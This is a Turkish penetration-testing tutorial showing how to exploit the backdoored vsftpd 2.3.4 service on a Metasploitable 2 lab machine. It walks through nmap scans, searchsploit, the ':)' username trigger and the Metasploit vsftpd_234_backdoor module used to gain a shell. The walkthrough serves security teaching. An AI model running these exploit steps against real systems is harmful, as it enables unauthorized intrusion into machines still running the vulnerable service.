MSF vsftpd_234_backdoor İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki vsftpd servisine ait zafiyet tespit edildikten sonra istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

IP adresi 100.100.200.7 olan Metasploitable 2, Nessus ile taratıldığında TCP 21. portta Vsftpd 2.3.4 uygulamasının hizmet verdiği görülmektedir. Bu sürümde VSFTPD indirme arşivine eklenen bir arka kapı bulumaktadır.

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-01

 

Sürüm bilgisi nmap aracı ile de tespit edilebilirdi.

nmap -sV -Pn -n 100.100.200.7 -p 21 –open

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-02

 

Vsftpd uygulamasının 2.3.4 sürüme ait zafiyet Nmap’in betikleri ile bulunabilir.

nmap 100.100.200.7 -p 21 –script vuln

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-03

 

Bunun yanında “searchsploit” aracı ile “exploit-db” üzerinde arama da gerçekleştirilebilir.

searchsploit vsftpd

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-04

 

VSFTPD 2.3.4 sürümünde bulunan zafiyet bir arka kapıdır. Eğer kullanıcı adı “:)” karakter çiftini içerirse, oturum açılabilmektedir. Örneğin kullanıcı adı “Merhaba:)” (veya “Mer:)haba”, “:)Merhaba”,…) parola da “Parola123” olarak denenirse oturum açılabilecektir.

USER Merhaba:)
PASSWORD Parola123

 

Bunun yanında otomatik olarak bu zafiyeti istismar etmek için Metaplosploit Framework içerisindeki vsftpd_234_backdoor istismar modülü kullanılabilir.

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-05

 

MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir.

set RHOST 100.100.200.7
run

acquiring-meterpreter-shell-on-linux-by-using-msf-vsftpd-234-backdoor-exploit-module-06

 

Kaynak:

Exploiting VSFTPD v2.3.4 on Metasploitable 2

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.